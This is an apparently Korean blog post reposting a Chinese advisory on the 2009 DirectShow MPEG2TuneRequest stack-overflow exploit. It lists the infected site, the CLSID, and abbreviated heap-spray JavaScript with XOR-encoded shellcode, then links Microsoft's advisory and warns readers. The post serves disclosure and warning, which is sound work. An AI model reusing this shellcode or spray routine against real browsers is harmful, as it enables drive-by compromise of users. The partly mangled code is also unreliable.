>> 2009.7.4 BDATuner.MPEG2TuneRequest Stack Overflow Exploit (高)
发现日期:2009-7-4
预计利用率提升几率 : 高▁▂▃▄▅▆▇
被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
软件: Microsoft DirectShow(msvidctl.dll)
版本: Possible all avaliable versions
article by safelab.spaces.live.com
ShellCode如下(有缩略):
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishimvp="shuishiMVP+shuishiMVP+bZmybr;" memory="new" x="0;x<300;x++)" myobject="document.createElement('object');" width="'1';" height="'1';" data="'./logo.gif';" classid="'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';">
MS에서도 이와 관련된 Security Advisory를 7월 6일에 발표하였습니다.
http://www.microsoft.com/technet/security/advisory/972890.mspx
조만간 긴급 패치가 나오겠지만, 그때까지 의심가는 웹 사이트는 절대로 방문하지 않는
사용자의 주의가 필요할 것 같습니다.
안전한 IE 사용은 아래의 사이트를 참고해 주세요.
No comments:
Post a Comment